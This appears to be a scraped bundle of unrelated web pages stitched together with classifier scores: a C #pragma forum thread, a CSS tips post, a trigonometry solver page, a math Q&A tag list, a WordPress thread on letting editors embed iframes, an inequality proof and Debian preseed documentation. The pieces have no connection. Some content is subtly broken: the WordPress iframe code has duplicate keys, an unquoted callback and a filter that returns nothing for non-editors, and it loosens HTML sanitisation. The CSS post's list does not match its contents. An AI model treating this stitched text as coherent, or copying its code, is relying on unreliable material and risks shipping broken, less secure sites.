Thread: #pragma ? 1. #1 Registered User Join Date Nov 2001 Posts 28 #pragma ? Can anyone tell me what #pragma does? I'm trying to write DLL's and I see examples using the line: Code: #pragma comment(lib, "theDLL.lib") I know that if u include that line u can call functions from the dll file, but then i see some examples do this: Code: extern "C" __declspec(dllimport) void fuction_name( ); void funtion_name(); Can someone tell me the details of what is happening? THX! Dat Dat http://hoteden.com <-- not an porn site damnit! 2. #2 Registered User Join Date Apr 2003 Posts 2,663 My book says #pragma is specifically for implementation defined options, so its affect will be described in your compiler documentation, and any #pragma directive that isn't recognized by the compiler will be ignored. Declaring a variable as extern implies that it is defined somewhere outside the present scope. As far as the details of the code you posted, I have no idea. 3. #3 Registered User Codeplug's Avatar Join Date Mar 2003 Posts 4,968 Here is the reference for all the MSVC pragma's. Enjoy. gg Popular pages Recent additions subscribe to a feed Similar Threads 1. labels inside the code #pragma mark label By nacho4d in forum C++ Programming Replies: 6 Last Post: 01-11-2009, 02:50 AM 2. #pragma pack(push,bitmap_data,1) ? By te5la in forum C++ Programming Replies: 3 Last Post: 10-07-2008, 04:38 PM 3. Programming a PIC 16F84 microcontroller in C By Iahim in forum C Programming Replies: 1 Last Post: 05-13-2004, 03:23 PM 4. what does #pragma do? By cbc in forum C++ Programming Replies: 2 Last Post: 10-16-2003, 07:51 AM 5. what is a pragma comment? By Shadow12345 in forum C++ Programming Replies: 9 Last Post: 11-25-2002, 05:50 AM Website Security Test
__label__pos
0.60642
Helloooo! Today I’m gonna be talking about 5 CSS properties (or actually 3 properties, and 2 pseudo classes), that I think deserve more love. Table Of Contents 1. accent-color 2. caret-color 3. ::selection (pseudo class) 4. user-select 5. :empty (pseudo class) 6. Final Thoughts accent-color To start of, this is a great css property just to add a little bit of more detail to your user-interface. This property applies to the input types: • <progress> • <input type="checkbox"> • <input type="range"> • <input type="radio"> The accent-color property allows you to very set the accent color (what you often see in radio-buttons, checkboxes, etc) to whatever color you’d like! Example: progress { accent-color: red; } input[type=checkbox] { accent-color: red; } input[type=radio] { accent-color: red; } input[type=range] { accent-color: red; } Accent Color CSS Example caret-color While barley noticable, the caret-color works perfecly with the accent-color property, and is a very nice little detail you should consider adding and using. Example: input { caret-color: red; } selection (pseudo class) While I know this is not really very unknown, I still don’t see it used enough. The simple ::selection pseudo element can very easily spice up your website by changing the styles of selected elements. Example: ::selection { background: red; color: white; } Selection Pseudo Element Example backdrop-filter Like the selection property, this might not be the most unnknown property, but I still don’t see it used enough. The backdrop-filter property allows you to apply a variety of filters to the area behind an element. Options: • blur() • brightness() • contrast() • drop-shadow() • grayscale() • hue-rotate() • invert() • opacity() • sepia() • saturate() Example: div.background { background: url(image.jpg) no-repeat center; background-size: cover; height: 100px; width: 100px; } div.filterbox { background-color: rgba(255, 255, 255, 0.4); backdrop-filter: sepia(100%); width: 50px; height: 100px; } Backdrop Filter Example empty (pseudo class) The empty pseudo class matches every element that has no children. This can be either element nodes or text (includind whitespaces). A fun usecase for this is for example when image is loading. div { width: 60px; height: 60px; background: grey; } div:empty { border: 2px solid red; } Empty Pseudo Class Example Final Thoughts That’s it for today’s list, there are of course there are a lot more tha I haven’t mentioned, but I appreciate you spending your time reading this post, if you’d like to read more here you go: 🔥 Goodbye Firebase, Hello SupaBase 🏠 Home Page
__label__pos
0.996155
Trigonometric equation solver This calculator can solve basic trigonometric equations such as: $\color{blue}{ \sin(x) = \frac{1}{2} }$ or $ \color{blue}{ \sqrt{2} \cos\left(-\frac{3x}{4}\right) - 1 = 0 } $. The calculator will find exact or approximate solutions on custom range. Solution can be expressed either in radians or degrees. Trigonometric Equation Solver show help ↓↓ examples ↓↓ ( · x ) = exact solutions (default) an approximate solution find all solutions (default) ≤ x ≤ radians (default) degrees working... examples example 1:ex 1: Solve equation $ \sin(2x)=\frac{\sqrt{3}}{2} ~~ \text{for} ~~ 0 \leq x \leq 360^\circ $. example 2:ex 2: Find all solutions of the equation $ \cos \left( \frac{3x}{2} \right) = -\frac{\sqrt{2}}{2}$. Express the results in degrees. example 3:ex 3: Find exact solutions of the equation $ \tan \left( -\frac{4x}{3} \right) = 0.4$. Express the results in radians. example 4:ex 4: Solve $ 2\sin \left( x \right) + \sqrt{2}= 0 ~~ \text{for} ~~ -180^\circ \leq x \leq 180^\circ $. Express the results in degrees. Search our database of more than 200 calculators Was this calculator helpful? Yes No 226 518 637 solved problems
__label__pos
0.999995
Questions tagged [irreducible-polynomials] Often called prime polynomials. Polynomials that have no polynomial divisors. Filter by Sorted by Tagged with 3 votes 2 answers 91 views Is $x^6 + bx^3 + b^2$ irreducible? Let $b\in \mathbb{Q}^*$ be rational number. We factorise $x^9-b^3\in \mathbb{Q}[x]$ and obtain $$x^9-b^3=(x^3-b)(x^6+bx^3+b^2).$$ Is the polynomial $x^6+bx^3+b^2$ irreducible? If $b=1$ we get a ... Jérémy Blanc's user avatar 4 votes 2 answers 64 views Find the product of all irreducible polynomials over $\mathbb{F}_p$ of degree $n$ Let $p$ be a prime number and $n \in \mathbb{N}^+$. Let $H_n$ be the product of all monic irreducible polynomials in $\mathbb{F}_p[T]$ whose degree is equal to $n$. What is known about $H_n$? Is there ... Martin Brandenburg's user avatar 2 votes 1 answer 124 views Generalization of Eisenstein's Criterion [duplicate] Let $f(X)=a_{2n+1}X^{2n+1}+\ldots+a_0\in \mathbb{Z}[X]$ with $$\begin{align*} a_{2n+1}&\not \equiv 0 \pmod p\\ a_{2n},\ldots,a_{n+1} &\equiv 0 \pmod p\\ a_n,\ldots,a_0&\equiv 0 \pmod{p^2} ... Kadmos's user avatar • 1,005 1 vote 0 answers 71 views Reduce Polynomial Over Real Numbers I was given the question $x^8 + 16$ and told to reduce it as much as able over the real numbers. Here is what I tried $x^8 + 16$ $(x^4+4)^2-8x^4$ $(x^4+4-2^{3/2}x^2)(x^4+4+2^{3/2}x^2)$ I can not ... Dan Lupu's user avatar • 113 -1 votes 0 answers 48 views $f(x,y,z) := y^2z + yz^2-x^3+xz^2$ is irrreducible in $\mathbb{Z}[x,y,z]$? Let $f(x,y,z) := y^2z + yz^2-x^3+xz^2.$ Then $f$ is irreducible in $\mathbb{Z}[x,y,z]$ so that $I:=(f)$ is a prime ideal of $\mathbb{Z}[x,y,z]$? I think that this is my first time of seeing a problem-... Plantation's user avatar • 2,016 -1 votes 1 answer 46 views Let $L$ be the splitting field of the polynomial $ f$ over $K$, Prove that if $n!=[L:K]$, the polynomial is irreducible [closed] Let $K$ be a field and $f \in K[x]$ be a non zero polynomial of degree $n$. Let $L$ be the splitting field of $f$ over $K$. Prove that $[L:K]$ divides $n!$ - I already proved this. Now I am stuck at ... darkside's user avatar 0 votes 0 answers 19 views How to generate all elements of an extension field from a base field? (GF(2)) I am trying to understand how to show something is a primitive polynomial; I understand it has to be irreducible by definition, and according to Wolfram: ... Ymi's user avatar • 141 4 votes 2 answers 66 views $y^{q-1}-f(x)$ irreducible over $\overline{F_{q}}[x]$ When $(\deg f,q-1)=1$ I am trying to solve the following problem, and I’d like to ask for some help. Let $q$ be a prime power, $f(x)\in F_{q}[x]$ a polynomial of degree $d$, such that $(d,q-1)=1$. I’d like to show that $G(... Espace' etale's user avatar 3 votes 1 answer 66 views Are irreducible elements of the tensor product of a vector space equivalent to irreducible polynomials? I'm looking for some feedback on a construction I came across. Loosely, it entails sending a vector space isomorphically to a vector space of polynomials, 'restoring' the ring structure, and asking ... Ryan Scott's user avatar 5 votes 0 answers 134 views Is Every Closed Algebraic Set of Dimension $n$ Contained in a Closed Variety of Dimension $n+1$ Let $V$ be an algebraic variety of dimension $m$ over an algebraically-closed field of characteristic $0$, and let $n<m$ and $U\subset V$ be a closed subset of $V$. Must there exist a subvariety $U\... Thomas Anton's user avatar • 2,246 2 votes 1 answer 69 views Maximal number of multiple points for an irreducible quartic I was working on this problem, but I don't see how I can solve it. I was given a hint, but I don't know how to use it. Can anyone help me? Thanks in advance! Let $f \in \Bbb C[x_0, x_1, x_2]$ be an ... Oopsilon's user avatar 0 votes 0 answers 43 views How do I prove that the primitive element of a field extension are this way. I'm doing an introductory course of field theory and there is one excercise that as easy as it seems it bring me on my nerves. It states: Let $α_1, \dots, α_n ∈ \mathbb{C}$ be the roots of an ... Floralys's user avatar 1 vote 1 answer 56 views $p$ a prime satisfying $p \equiv 3 \mod 4 $. Then, the quotient field $ F_p [x] / (x^2 + 1)$ contains $\bar{x}$ that is a square root of -1 I know that $x^2 + 1$ is irreducible in $F_p[x]$ if and only if $-1$ is not a square in $F_p$. Otherwise, $x^2 + 1$ could be factored out. $-1$ not being a quadratic residue in $F_p$ is equivalent to ... pedropedro's user avatar 1 vote 1 answer 52 views On Unique factorization of polynomials I'm studying Lang's Linear Algebra and stumbled upon a lemma prior to the unique factorization of polynomials that says the following "Let p be irreducible in K[t]. Let f, g be non-zero ... Alejandro Aguilar's user avatar 1 vote 1 answer 73 views Show that $f(x)=x^2+2x-1 \in \mathbb{Z}_3[x]$ is irreducible over $\mathbb{Z}_3$. And find the elements of a finite field with 9 elements. Show that $f(x)=x^2+2x-1 \in \mathbb{Z}_3[x]$ is irreducible over $\mathbb{Z}_3$. Using this fact construct a finite field $\mathbb{F}_9$ of $9$ elements. If $\alpha$ is a root of $f(x)$, then find ... ARROW's user avatar • 741 0 votes 1 answer 50 views Generalization or criteria for a proposition for checking irreducibility of polynomials with summand of only two degrees Is the follow proposition Prop Let $f \in k\left[x_1, x_2, \ldots, x_n\right]$ be a polynomial with the form $l+h$, where $l$ is an irreducible non constant homogeneous polynomial and $h$ is a ... onriv's user avatar • 1,224 0 votes 1 answer 100 views Question about the solution of the polynomial $(x−1)(x−2)⋯(x−n)−1$ is irreducible in $\mathbb{Z}\left [ x \right ]$ for all $n≥1$ The solution of the polynomial $(x−1)(x−2)⋯(x−n)−1$ is irreducible in $\mathbb{Z}\left [ x \right ]$ for all $n≥1$ is in here. I think it's no problem that do the same thing on $\mathbb{Q\left [ x \... Zhiwei's user avatar • 11 0 votes 1 answer 40 views Reducibility of constrained polynomial Let $f \in \mathbb{Z}[x, y]$ be a polynomial. Suppose that the list of terms of $f$ do not involve the $y$ variable except for a single $y^2$ term with some arbitrary coefficient. When is $f$ ... Thomas's user avatar • 932 2 votes 2 answers 155 views Quintic equation with integer coefficients I am looking for a way to find a closed form of the real root of the quintic eq. with integer coefficients: $x^5+3x^4+4x^3+x-1=0$. According to the numerical calculation the root $x_0\approx 0.... Mikhail Gaichenkov's user avatar 1 vote 1 answer 37 views Is there a special name for linear irreducible polynomials (over the complex numbers)? According to the fundamental theorem of algebra every polynomial over the complex numbers can be factorized into the following form: $$ c (x - r_1) (x - r_2) (x - r_3) \dots $$ where $r_i$ are the ... zvavybir's user avatar • 169 0 votes 1 answer 59 views $x^m+y^m+1$ is irreducible in $k[x,y]$ Question: Let $k$ be a field with characteristic $0$. Let $m\geq 2$ be an integer. Show that $f(x,y)=x^m+y^m+1$ is irreducible in $k[x,y]$. Answer: I have no idea how to solve this question. Any hint/... confused's user avatar • 499 1 vote 1 answer 40 views Let $\alpha \in \mathbb{C}$ a root of $f(x)=x^3-3x-1$. Prove $f$ is irreducible over $\mathbb{Q}$. I encountered the following claim: Let $\alpha \in \mathbb{C}$ a root of $f(x)=x^3-3x-1$. Prove $f$ is irreducible over $\mathbb{Q}$. The explanation included something of the form: Since $f$ has ... Anon's user avatar • 1,639 3 votes 0 answers 62 views Different approach to see that $X^{nm}-2^n3^m$ is irreducible over $\mathbb{Z}$ [duplicate] I came across the problem to show that when $n,m\in \mathbb{N}$ are coprime then the polynomial $X^{nm}-2^n3^m$ is irreducible over $\mathbb{Z}$. I solved it appealing to knowledge of complex numbers, ... Masacroso's user avatar • 29.6k 0 votes 0 answers 60 views $p$ odd prime and $n$ integer. Prove that $x^n - p$ is irreducible over $\mathbb{Z}[i]$ By Eisenstein's criterion I know that the polynomial is irreducible in $\mathbb{Z}[X]$, since $p$ divides $p$ and $p^2$ does not divide $p$. But I do not know how to extend to $\mathbb{Z}[i]$. Jensyn Jessid Pérez Lucio's user avatar 0 votes 1 answer 98 views What are elements of the field $\frac{\mathbb{F}_2[x,y]}{x^3-y^2+x+1}$? Is that polynomial irreducible? On a previous problem, I had the field $A=\mathbb{F}_3[x]$ and the polynomial $p(x)=x^3+x+1$, where that polynomial is reducible in $\mathbb{F}_3$, then I had $\frac{A}{p(x)}$ and I had to find its ... Tomas Rojas's user avatar 0 votes 1 answer 60 views Prove that $f$ is irreducible if it has no roots in a finite field $F$. [closed] Let $f\in\mathbb{Z}[X]$ be a monic polynomial with $\text{deg}(f)=5$. Suppose that there exist a prime number $p$ and a finite field $F$ of order $p^2$ such that $f$ has no roots in $F$. Prove that $f$... mathematica's user avatar 3 votes 1 answer 96 views How can I know if the polynomial $x^4 -16x^3 +12x^2 - 3x + 9$ is irreducible over $\mathbb{Z}$? How can I know if the polynomial $x^4 -16x^3 +12x^2 - 3x + 9$ is irreducible over $\mathbb{Z}$? I have tried to use Eisenstein's criterion by evaluating on polynomials of the form ax+b but I have not ... Jensyn Jessid Pérez Lucio's user avatar 6 votes 1 answer 92 views Does $\sqrt a + \sqrt b$ have a four way conjugate? Let $a, b$ be rational numbers that are not perfect squares. Consider the set $S = \{\sqrt a + \sqrt b, \sqrt a - \sqrt b, - \sqrt a + \sqrt b, -\sqrt a - \sqrt b\}$. If $p$ is a polynomial with ... SRobertJames's user avatar • 2,722 3 votes 2 answers 194 views $x^6 + 69x^5 − 511x + 363$ is irreducible over $\mathbb Z$? As mentioned, I am trying to show that $x^6 + 69x^5 − 511x + 363$ is irreducible over $\mathbb Z$. To see that it has no roots and no cubic factors, I send the polynomial to $\mathbb F_7$ and $\mathbb ... SummerAtlas's user avatar • 1,001 1 vote 1 answer 36 views Knowing that $f'$ has a rational root, what can we say about the discriminant of a root of $f$, where $f$ is monic and irreducible over $\mathbb{Z}$ Let $f(x)$ be a monic irreducible polynomial over $\mathbb{Z}$ and let $\alpha$ be a root of $f$. Then I have to show that $f(r)~|~disc(\alpha)$, when $f'(x)$ has a root $r$ in $\mathbb{Z}$. These are ... ShyamalSayak's user avatar 2 votes 1 answer 40 views Does non-zero abolute trace of an element $\alpha$ imply the irreducibility of $f(x)=x^p-x-\alpha$ I am currently reading the paper "Fast Contruction of Irreducible Polynomials over Finite Fields" by Couveignes and Lercier. On page 81, it reads, "... So $1/(1-b)$ is a root of the ... MinecraftPlayer69's user avatar 1 vote 1 answer 61 views Monic irreducible polynomial $f \in \mathbb{Z}[x]$ of degree $n$ such that $\operatorname{Gal}(f) \cap C_j \neq \emptyset$ $ \forall j$… I’m trying to solve the following problem: Let $C_1, \ldots, C_m \subseteq S_n$ be conjugacy classes of elements in $S_n$. Show that there exists a monic irreducible polynomial $f \in \mathbb{Z}[x]$ ... Gokimo's user avatar • 277 2 votes 1 answer 117 views $-3x^{2m}+7x^m-3$ is irreducible for all $m\geq 1$ I have heard that $p(x)=-3x^2+7x-3$ is the simplest polynomial for which $p(1)=1$, $p(x)=x^{\deg p}\cdot p(x^{-1})$ and $p(x^m)$ is irreducible for all $m\geq 1$. I have tried to show the last part, i.... NothingInSense's user avatar 1 vote 0 answers 76 views Proving that a smooth affine variety is irreducible I am struggling with the following problem. Given a complex polynomial $f : \mathbb{C}^n \rightarrow \mathbb{C}$ such that $\nabla f$ doesn't vanish anywhere on the whole $\mathbb{C}^n$, $V = V(f)$ is ... Cactus's user avatar • 4,952 1 vote 1 answer 72 views Is $x^{100} - x^2 + 1$ separable in an algebraic closure of $\mathbb{F}_2$ My approach: $f'(X) = 100x^{99} - 2x = 0x^{99} - 0x = 0$ since in $\mathbb{F}_2$. So the $\gcd(f,f') = f > 1$, thus not separable. On the other hand, $f(0) \neq 0 \neq f(1)$, so irreducible. But ... NiRvanA's user avatar • 57 1 vote 1 answer 40 views Multiple roots of irreducible polynomials over fields of positive characteristic It can be proved that if $K$ a field, then $f \in K[x]$ has $a$ as a multiple root if and only if $f(a) = f'(a) = 0$. And as a corollary, if $K$ has characteristic $0$, then irreducible polynomials do ... Francisca Aguayo's user avatar 0 votes 1 answer 54 views Is $13x^5 + (3 − i)x^3 + (8 − i)(x^2 − x) + 1 − 2i$ irreducible in $(\mathbb{Q}[i])[x]$? Is $$13x^5 + (3 − i)x^3 + (8 − i)(x^2 − x) + 1 − 2i$$ irreducible in $(\mathbb{Q}[i])[x]$? I've tried using Eisenstein’s irreducibility criterion to prove that it is, but I don't think it applies ... Dawid's user avatar • 51 2 votes 1 answer 67 views Show that $\langle X_1X_4-X_2X_3 \rangle$ is irreducible in $\mathbb{Q}[X_1,X_2,X_3,X_4]$. In lecture we did the following example. Show that $X_1X_4-X_2X_3$ is irreducible in $\mathbb{Q}[X_1,X_2,X_3,X_4]$. We wrote down that if $X_1X_4-X_2X_3 = a\cdot b$ for some $a,b \in \mathbb{Q}[X_1,... 3nondatur's user avatar • 3,902 1 vote 2 answers 67 views Factorization over $\mathbb{Q}$ and $\mathbb{Z_{41}}$ Factor $f(x) = x^4+1$ over $\mathbb{Q}$ and over $\mathbb{Z_{41}}$. 1)I can't factor $f(x)$ over $\mathbb{Q}$ because $f(x+1)$ is irreducible by Eisenstein's criterion. 2)I don't know where to start: ... jontao's user avatar • 33 3 votes 2 answers 111 views Showing that $f=X^p-X+T$ is irreducible over $\mathbb{F}_p(T)[X]$ Let $K=\mathbb{F}_p(T)$ be the field of rational functions on one variable T over $\mathbb{F}_p$, and $f=X^p-X+T \in K[X]$. I want to show that $f$ is an irreducible polynomial. I know that $T$ is a ... Gokimo's user avatar • 277 0 votes 2 answers 45 views $x^{\frac{p-1}{2}}+1$ is reducible in $\Bbb Z_p[x]$ [closed] Let $p$ be an odd prime. Prove that the polynomial $f(x) = x^{\frac{p-1}{2}}+1$ is reducible in $\Bbb Z_p[x]$ and factor $f(x)$ into irreducible polynomials in $\Bbb Z_p[x]$. I've been struggling ... Hobby's user avatar • 103 1 vote 1 answer 42 views Dimension of $\mathbb{Q(\omega)}$ and minimal polynomial of $\sqrt[3]{2}$ Consider: $$\omega = \frac{-1}{2} + \frac{\sqrt{3} i}{2}$$ and the simple extension $\mathbb{Q(\omega)}$. Find the dimension of $\mathbb{Q(\omega)}$ and the minimal polynomial of $\sqrt[3]{2}$ over $\... jontao's user avatar • 33 1 vote 0 answers 53 views Ask for help on proving irreducible polynomial on $K[x]$ Let $F$ be a field and $a,b\in F$ with $a\ne0$. Then, $f(x)\in F[x]$ is irreducible if and only if $f(ax+b)\in F[x]$ is irreducible. This is my proof $(\Rightarrow)$ Suppose $f(x)=h(x)g(x)$ is ... Kelvin's user avatar • 11 0 votes 0 answers 36 views An irreducible polynomial over Zp [duplicate] In general, there is a problem: "Prove that the polynomial $f(x) = x^{p} - x - 1$ is irreducible over $\mathbb{Z}p$ ($p$ is a prime number)". I had an idea to solve this problem using the ... Леонид Сергеевич's user avatar 0 votes 1 answer 66 views Some properties about $\mathbb{F}_3[x]/(x^3+x+1)$ I am given $L:=\frac{\mathbb{F}_3[x]}{(x^3+x+1)}$ and I have to prove different properties about this object. First of all, since the polynomial for which I make the quotient is reductible $$x^3+x+1=(... HornyPigeon54's user avatar 3 votes 2 answers 147 views integral solutions of polynomials in two variables Consider the polynomial $$ 27x^4 - 256 y^3 = k^2, $$ where $k$ is an integer. As $k$ varies over all positive integers, is it possible to show that there are infinitely many distinct integral ... debanjana's user avatar • 938 1 vote 0 answers 25 views Using translations to apply Eisenstein's criterion of irreducibility - some kind of bound or condition? [duplicate] Eisenstein's criterion states that for a polynomial $$f(X)=a_0 + a_1X + ... + a_nX^n$$ with $a_0, ..., a_n \in \mathbb{Z}$ (or more generally a UFD), then if there exists a prime $p$ such that $p \... Robin's user avatar • 838 1 vote 1 answer 80 views Is $x^2+x-1\in\mathbb{F}_3[x]$ irreductible? I have to see whether $x^2+x-1\in\mathbb{F}_3[x]$ is irreductible. One first way to see this is by checking if there exist any roots of the polynomial on the field, the problem is that I don't ... HornyPigeon54's user avatar 5 votes 0 answers 96 views Incorrect Solution for A Book of Abstract Algebra Chapter 26 Question E4 For this exercise, you are supposed to show that the polynomial $$ x^4+1 $$ is irreducible in $\mathbb{Z}_5$. However, I found that $$ (x^2+2)(x^2+3) = x^4+5x^2+6 = x^4+1. $$ Is the ... dryoung's user avatar • 71 0 votes 0 answers 35 views Irreducible Polynomial examples in Gallian's Contemporary Abstract Algebra In Chapter 17 of Gallian's Contemporary Abstract Algebra, 8th Edition, irreducible polynomials are defined as: in an integral domain $D$, whenever $f(x)$ from $D[x]$ is expressed as a product $f(x)=g(... Pat Muchmore's user avatar 1 2 3 4 5 63  
__label__pos
0.983392
Support » Networking WordPress » Allow Editors to Post iFrame embeds • Dean (@deantester) We are running a large multisite and we have users who now want to embed Facebook videos on their pages. I’d like to enable them to do this by pasting the iFrame with Custom HTML. This works fine for admins, but for Editors, they are not able to post iFrame (content is stripped — likely due to unfiltered_html role only being accessible to Super Admins. How can I give them this role? I’ve tried a plugin (Menu Editor Pro) and some code, but neither worked. Here’s the code I tried in functions.php: function add_theme_caps() { // gets the author role $role = get_role( 'editor' ); // This only works, because it accesses the class instance. // would allow the author to edit others' posts for current theme only $role->add_cap( 'unfiltered_html' ); } add_action( 'admin_init', 'add_theme_caps'); We cannot do this with “Embed” blocks because Facebook has blocked oEmbed, and I cannot ask users to connect their Facebook pages, use app IDs, etc., that are required by other plugins. Viewing 3 replies - 1 through 3 (of 3 total) • MK (@mkarimzada) Use map_meta_cap() function to add caps to a specific role in multisite. Also it’s possible to use kses_remove_filters() on a specific page or user/role. Example: function editor_unfiltered_html_cap( $caps, $cap, $user_id, $args ) { $user = get_userdata( $user_id ); $user_roles = $user->roles; if( in_array( 'editor', $user_roles, true ) && !defined( 'DISALLOW_UNFILTERED_HTML' ) ) { $caps[] = 'unfiltered_html'; } return $caps; } add_filter( 'map_meta_cap', 'editor_unfiltered_html_cap', 10, 4 ); I hope this helps. • This reply was modified 1 month, 1 week ago by MK. Reason: improved if statement Thread Starter Dean (@deantester) Thank you @mkarimzada for the reply but that code was unsuccessful in resolving my issue — editors are still not able to update iFrames. MK (@mkarimzada) This seems to be a change in security policies of Gutenberg and I’m 100% sure there is a reason for it. I’ve found this open issue on Gutenberg repo https://github.com/WordPress/gutenberg/issues/15137. Have you tried Unfiltered MU by Automattic? Another possible solution would be allowing iframe via wp_kses_allowed_html, but not recommended. Also, you need to make sure editors are 100% trusted before doing this. function allow_iframes_for_editor( $allowed_tags ){ $allowed_tags['iframe'] = array( 'align' => true, 'allow' => true, 'allowfullscreen' => true, 'class' => true, 'frameborder' => true, 'height' => true, 'id' => true, 'marginheight' => true, 'marginwidth' => true, 'name' => true, 'scrolling' => true, 'src' => true, 'style' => true, 'width' => true, 'allowFullScreen' => true, 'class' => true, 'frameborder' => true, 'height' => true, 'mozallowfullscreen' => true, 'src' => true, 'title' => true, 'webkitAllowFullScreen' => true, 'width' => true ); if ( current_user_can('editor') ) { return $allowed_tags; } } add_filter( 'wp_kses_allowed_html', allow_iframes_for_editor, 1 ); I hope this helps. Viewing 3 replies - 1 through 3 (of 3 total) • You must be logged in to reply to this topic.
__label__pos
0.946092
4 $\begingroup$ Prove that: $$ \left(a+\frac{1}{a}\right)^2+\left(b+\frac{1}{b}\right)^2\ge\frac{25}{2} $$ if $a,b$ are positive real numbers such that $a+b=1$. I have tried expanding the squares and rewriting them such that $a+b$ is a term/part of a term but what I get is completely contradictory to what is asked to prove $\endgroup$ • $\begingroup$ Maybe use the fact that $(a+b)^2=1$ also. $\endgroup$ – Sam Weatherhog Nov 3 '15 at 1:43 • 2 $\begingroup$ Is that a typo, or is it not symmetric? That is, did you intend the $\color{Red}2$ to be in $(a+\frac1{a^{\color{Red}2}})^2$ and not in $(b+\frac1b)^2$? $\endgroup$ – Akiva Weinberger Nov 3 '15 at 1:47 • 2 $\begingroup$ Should the second term be $\left(b+\frac{1}{b^2}\right)^2$? $\endgroup$ – Sam Weatherhog Nov 3 '15 at 1:47 • 1 $\begingroup$ i'm guessing that the first expression should be $(a+\frac 1a)^2$ $\endgroup$ – WW1 Nov 3 '15 at 1:49 • $\begingroup$ I'm sorry. Its (a+1/a)^2 $\endgroup$ – Gayatri Nov 3 '15 at 11:44 8 $\begingroup$ For $E=(a+1/a)^2+(b+1/b)^2=a^2+b^2+1/a^2+1/b^2+4$ you have $1=(a+b)^2=a^2+b^2+2ab\leq 2(a^2+b^2)$, so $a^2+b^2\geq 1/2$. Moreover, $\frac{a+b}{2}\geq 2\sqrt{ab}$ so $\frac{1}{(ab)^2}\geq 16$. This implies $$E=a^2+b^2+\frac{a^2+b^2}{a^2b^2}+4\geq 9/2+8=\frac{25}{2},$$ because $\frac{a^+b^2}{a^2b^2}\geq \frac{1}{2}\cdot 16=8$ $\endgroup$ • $\begingroup$ Very cool solution. Much more direct than my method. $\endgroup$ – goblin Nov 3 '15 at 2:22 • 1 $\begingroup$ Nice +1. For the current version of the problem, you may say $\dfrac1{a^2}>\dfrac1a$, so there is strict inequality. $\endgroup$ – Macavity Nov 3 '15 at 2:28 • $\begingroup$ Really elegant solution! +1 $\endgroup$ – ZFR Nov 3 '15 at 11:55 • $\begingroup$ Thank you for the solutions provided. I am tyring to understand it. But I am not able to understand this part. How was this derived. :$\frac{a+b}{2}$ is greater than oe equal to $2*\sqrt{ab}$ $\endgroup$ – Gayatri Nov 3 '15 at 13:44 • 1 $\begingroup$ It is a typo, it should be $a+b\ge 2\sqrt{ab}$, which is really what is used in the next line. This follows from $(\sqrt a - \sqrt b)^2\ge 0$ and is well known, very useful to remember. $\endgroup$ – Macavity Nov 3 '15 at 14:14 6 $\begingroup$ For your revised question, another way is to note that $(x + \frac1x)^2$ is convex, so by Jensen's inequality: $$\left(a + \frac1a\right)^2 + \left(b + \frac1b\right)^2 \ge 2\left(\frac{a+b}2 + \frac2{a+b}\right)^2=2\left(\frac12 + 2\right)^2=\frac{25}2$$ $\endgroup$ 0 $\begingroup$ Without loss of generality we can choose $a=sin^2x$ and $b=cos^2x$ for $x \in \left(0 \: \frac{\pi}{2}\right)$ Now $$a^2+b^2=sin^4x+cos^4x=1-2sin^2xcos^2x=1-\frac{sin^22x}{2}=\frac{3+cos4x}{4} \ge \frac{1}{2}$$ with Equality at $x=\frac{\pi}{4}$ Also $$2sinxcosx \le 1$$ $\implies$ $$\frac{1}{sin^4xcos^4x} \ge 16$$ Now by $CS$ Inequality $$\left(\frac{1}{a^2}+\frac{1}{b^2}\right)(1^2+1^2) \ge\left(\frac{1}{a}+\frac{1}{b}\right)^2=(sec^2x+cosec^2x)^2=(sec^2xcosec^2x)^2=sec^4xcosec^4x=\frac{1}{sin^4xcos^4x} \ge 16$$ Thus $$\left(\frac{1}{a^2}+\frac{1}{b^2}\right)(1^2+1^2) \ge 16$$ $$\left(\frac{1}{a^2}+\frac{1}{b^2}\right) \ge 8$$ Thus $$\left(a+\frac{1}{a}\right)^2+\left(b+\frac{1}{b}\right)^2 \ge \frac{1}{2}+8+4=\frac{25}{2}$$ $\endgroup$ Your Answer By clicking “Post Your Answer”, you agree to our terms of service, privacy policy and cookie policy Not the answer you're looking for? Browse other questions tagged or ask your own question.
__label__pos
0.999901
B.4. Contents of the preconfiguration file (for squeeze) The configuration fragments used in this appendix are also available as an example preconfiguration file from http://www.debian.org/releases/squeeze/example-preseed.txt. Note that this example is based on an installation for the Intel x86 architecture. If you are installing a different architecture, some of the examples (like keyboard selection and bootloader installation) may not be relevant and will need to be replaced by debconf settings appropriate for your architecture. Details on how the different Debian Installer components actually work can be found in Section 6.3, “Using Individual Components”. B.4.1. Localization Setting localization values will only work if you are using initrd preseeding. With all other methods the preconfiguration file will only be loaded after these questions have been asked. The locale can be used to specify both language and country and can be any combination of a language supported by debian-installer and a recognized country. If the combination does not form a valid locale, the installer will automatically select a locale that is valid for the selected language. To specify the locale as a boot parameter, use locale=en_US. Although this method is very easy to use, it does not allow preseeding of all possible combinations of language, country and locale[24]. So alternatively the values can be preseeded individually. Language and country can also be specified as boot parameters. # Preseeding only locale sets language, country and locale. d-i debian-installer/locale string en_US # The values can also be preseeded individually for greater flexibility. #d-i debian-installer/language string en #d-i debian-installer/country string NL #d-i debian-installer/locale string en_GB.UTF-8 # Optionally specify additional locales to be generated. #d-i localechooser/supported-locales en_US.UTF-8, nl_NL.UTF-8 Keyboard configuration consists of selecting a keyboard architecture and a keymap. In most cases the correct keyboard architecture is selected by default, so there's normally no need to preseed it. The keymap must be known to the debian-installer for the selected keyboard architecture. # Keyboard selection. #d-i console-tools/archs select at d-i console-keymaps-at/keymap select us d-i keyboard-configuration/xkb-keymap select us # Example for a different keyboard architecture #d-i console-keymaps-usb/keymap select mac-usb-us To skip keyboard configuration, preseed console-tools/archs with skip-config. This will result in the kernel keymap remaining active. Note The changes in the input layer for 2.6 kernels have made the keyboard architecture virtually obsolete. For 2.6 kernels normally a “PC” (at) keymap should be selected. B.4.2. Network configuration Of course, preseeding the network configuration won't work if you're loading your preconfiguration file from the network. But it's great when you're booting from CD or USB stick. If you are loading preconfiguration files from the network, you can pass network config parameters by using kernel boot parameters. If you need to pick a particular interface when netbooting before loading a preconfiguration file from the network, use a boot parameter such as interface=eth1. Although preseeding the network configuration is normally not possible when using network preseeding (using “preseed/url”), you can use the following hack to work around that, for example if you'd like to set a static address for the network interface. The hack is to force the network configuration to run again after the preconfiguration file has been loaded by creating a “preseed/run” script containing the following commands: killall.sh; netcfg The following debconf variables are relevant for network configuration. # Disable network configuration entirely. This is useful for cdrom # installations on non-networked devices where the network questions, # warning and long timeouts are a nuisance. #d-i netcfg/enable boolean false # netcfg will choose an interface that has link if possible. This makes it # skip displaying a list if there is more than one interface. d-i netcfg/choose_interface select auto # To pick a particular interface 